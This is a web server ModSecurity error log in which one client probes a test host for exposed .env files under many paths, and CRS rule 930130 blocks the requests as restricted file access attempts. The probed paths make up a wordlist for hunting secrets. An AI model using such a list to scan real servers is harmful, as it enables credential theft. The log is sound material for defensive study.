[Thu Nov 27 04:11:50.007653 2025] [:error] [pid 354741] [client 54.236.248.190:54774] [client 54.236.248.190] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aSfBds6T76P9_m8d0ivoTgAAAAg"]
[Thu Nov 27 04:11:50.007964 2025] [:error] [pid 354741] [client 54.236.248.190:54774] [client 54.236.248.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aSfBds6T76P9_m8d0ivoTgAAAAg"]
[Thu Nov 27 04:11:50.008234 2025] [:error] [pid 354741] [client 54.236.248.190:54774] [client 54.236.248.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aSfBds6T76P9_m8d0ivoTgAAAAg"]
[Thu Nov 27 04:11:50.416364 2025] [:error] [pid 353185] [client 54.236.248.190:54898] [client 54.236.248.190] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.remote"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.remote"] [unique_id "aSfBdnTG8IrOxOxezX5ARQAAAAE"]
[Thu Nov 27 04:11:50.416595 2025] [:error] [pid 353185] [client 54.236.248.190:54898] [client 54.236.248.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.remote"] [unique_id "aSfBdnTG8IrOxOxezX5ARQAAAAE"]
[Thu Nov 27 04:11:50.416796 2025] [:error] [pid 353185] [client 54.236.248.190:54898] [client 54.236.248.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.remote"] [unique_id "aSfBdnTG8IrOxOxezX5ARQAAAAE"]
[Thu Nov 27 04:11:50.826467 2025] [:error] [pid 354739] [client 54.236.248.190:55002] [client 54.236.248.190] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aSfBdu_UStX-GTeIAe_ujwAAAAY"]
[Thu Nov 27 04:11:50.826715 2025] [:error] [pid 354739] [client 54.236.248.190:55002] [client 54.236.248.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aSfBdu_UStX-GTeIAe_ujwAAAAY"]
[Thu Nov 27 04:11:50.826938 2025] [:error] [pid 354739] [client 54.236.248.190:55002] [client 54.236.248.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aSfBdu_UStX-GTeIAe_ujwAAAAY"]
[Thu Nov 27 04:11:51.237179 2025] [:error] [pid 354737] [client 54.236.248.190:55114] [client 54.236.248.190] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vendor/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env"] [unique_id "aSfBd3eYAxY_xo8wsP-UZAAAAAU"]
[Thu Nov 27 04:11:51.237402 2025] [:error] [pid 354737] [client 54.236.248.190:55114] [client 54.236.248.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env"] [unique_id "aSfBd3eYAxY_xo8wsP-UZAAAAAU"]
[Thu Nov 27 04:11:51.237607 2025] [:error] [pid 354737] [client 54.236.248.190:55114] [client 54.236.248.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env"] [unique_id "aSfBd3eYAxY_xo8wsP-UZAAAAAU"]
[Thu Nov 27 04:11:51.669754 2025] [:error] [pid 353187] [client 54.236.248.190:55240] [client 54.236.248.190] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lib/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/lib/.env"] [unique_id "aSfBd3jjVMPW7zDRgsav_wAAAAM"]
[Thu Nov 27 04:11:51.669977 2025] [:error] [pid 353187] [client 54.236.248.190:55240] [client 54.236.248.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/lib/.env"] [unique_id "aSfBd3jjVMPW7zDRgsav_wAAAAM"]
[Thu Nov 27 04:11:51.670168 2025] [:error] [pid 353187] [client 54.236.248.190:55240] [client 54.236.248.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/lib/.env"] [unique_id "aSfBd3jjVMPW7zDRgsav_wAAAAM"]
[Thu Nov 27 04:11:52.101754 2025] [:error] [pid 353186] [client 54.236.248.190:55380] [client 54.236.248.190] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/lab/.env"] [unique_id "aSfBeCOJA5NFmjDGU5hH8wAAAAI"]
[Thu Nov 27 04:11:52.101976 2025] [:error] [pid 353186] [client 54.236.248.190:55380] [client 54.236.248.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/lab/.env"] [unique_id "aSfBeCOJA5NFmjDGU5hH8wAAAAI"]
[Thu Nov 27 04:11:52.102168 2025] [:error] [pid 353186] [client 54.236.248.190:55380] [client 54.236.248.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/lab/.env"] [unique_id "aSfBeCOJA5NFmjDGU5hH8wAAAAI"]
[Thu Nov 27 04:11:52.543882 2025] [:error] [pid 354740] [client 54.236.248.190:55520] [client 54.236.248.190] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cronlab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/cronlab/.env"] [unique_id "aSfBeCz_tey498iHQ9af8gAAAAc"]
[Thu Nov 27 04:11:52.544131 2025] [:error] [pid 354740] [client 54.236.248.190:55520] [client 54.236.248.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/cronlab/.env"] [unique_id "aSfBeCz_tey498iHQ9af8gAAAAc"]
[Thu Nov 27 04:11:52.544332 2025] [:error] [pid 354740] [client 54.236.248.190:55520] [client 54.236.248.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/cronlab/.env"] [unique_id "aSfBeCz_tey498iHQ9af8gAAAAc"]
[Thu Nov 27 04:11:52.952626 2025] [:error] [pid 353188] [client 54.236.248.190:55662] [client 54.236.248.190] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aSfBeD4fHjXDucK3GWvWVwAAAAQ"]
[Thu Nov 27 04:11:52.952850 2025] [:error] [pid 353188] [client 54.236.248.190:55662] [client 54.236.248.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aSfBeD4fHjXDucK3GWvWVwAAAAQ"]
[Thu Nov 27 04:11:52.953057 2025] [:error] [pid 353188] [client 54.236.248.190:55662] [client 54.236.248.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aSfBeD4fHjXDucK3GWvWVwAAAAQ"]
[Thu Nov 27 04:11:53.385330 2025] [:error] [pid 353184] [client 54.236.248.190:55800] [client 54.236.248.190] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aSfBeYG5PbbCKE0XPKZgaQAAAAA"]
[Thu Nov 27 04:11:53.385556 2025] [:error] [pid 353184] [client 54.236.248.190:55800] [client 54.236.248.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aSfBeYG5PbbCKE0XPKZgaQAAAAA"]
[Thu Nov 27 04:11:53.385743 2025] [:error] [pid 353184] [client 54.236.248.190:55800] [client 54.236.248.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aSfBeYG5PbbCKE0XPKZgaQAAAAA"]
[Thu Nov 27 04:11:53.796899 2025] [:error] [pid 354741] [client 54.236.248.190:55910] [client 54.236.248.190] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/core/app/.env"] [unique_id "aSfBec6T76P9_m8d0ivoTwAAAAg"]
[Thu Nov 27 04:11:53.797131 2025] [:error] [pid 354741] [client 54.236.248.190:55910] [client 54.236.248.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/core/app/.env"] [unique_id "aSfBec6T76P9_m8d0ivoTwAAAAg"]
[Thu Nov 27 04:11:53.797313 2025] [:error] [pid 354741] [client 54.236.248.190:55910] [client 54.236.248.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/core/app/.env"] [unique_id "aSfBec6T76P9_m8d0ivoTwAAAAg"]
[Thu Nov 27 04:11:54.206748 2025] [:error] [pid 353185] [client 54.236.248.190:56032] [client 54.236.248.190] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/datavase/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/core/Datavase/.env"] [unique_id "aSfBenTG8IrOxOxezX5ARgAAAAE"]
[Thu Nov 27 04:11:54.207328 2025] [:error] [pid 353185] [client 54.236.248.190:56032] [client 54.236.248.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/core/Datavase/.env"] [unique_id "aSfBenTG8IrOxOxezX5ARgAAAAE"]
[Thu Nov 27 04:11:54.207538 2025] [:error] [pid 353185] [client 54.236.248.190:56032] [client 54.236.248.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/core/Datavase/.env"] [unique_id "aSfBenTG8IrOxOxezX5ARgAAAAE"]
[Thu Nov 27 04:11:54.618235 2025] [:error] [pid 354739] [client 54.236.248.190:56164] [client 54.236.248.190] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /database/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/database/.env"] [unique_id "aSfBeu_UStX-GTeIAe_ukAAAAAY"]
[Thu Nov 27 04:11:54.618607 2025] [:error] [pid 354739] [client 54.236.248.190:56164] [client 54.236.248.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/database/.env"] [unique_id "aSfBeu_UStX-GTeIAe_ukAAAAAY"]
[Thu Nov 27 04:11:54.618861 2025] [:error] [pid 354739] [client 54.236.248.190:56164] [client 54.236.248.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/database/.env"] [unique_id "aSfBeu_UStX-GTeIAe_ukAAAAAY"]
[Thu Nov 27 04:11:55.051844 2025] [:error] [pid 354737] [client 54.236.248.190:56288] [client 54.236.248.190] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aSfBe3eYAxY_xo8wsP-UZQAAAAU"]
[Thu Nov 27 04:11:55.052067 2025] [:error] [pid 354737] [client 54.236.248.190:56288] [client 54.236.248.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aSfBe3eYAxY_xo8wsP-UZQAAAAU"]
[Thu Nov 27 04:11:55.052250 2025] [:error] [pid 354737] [client 54.236.248.190:56288] [client 54.236.248.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aSfBe3eYAxY_xo8wsP-UZQAAAAU"]
[Thu Nov 27 04:11:55.484150 2025] [:error] [pid 353187] [client 54.236.248.190:56396] [client 54.236.248.190] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /assets/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aSfBe3jjVMPW7zDRgsawAAAAAAM"]
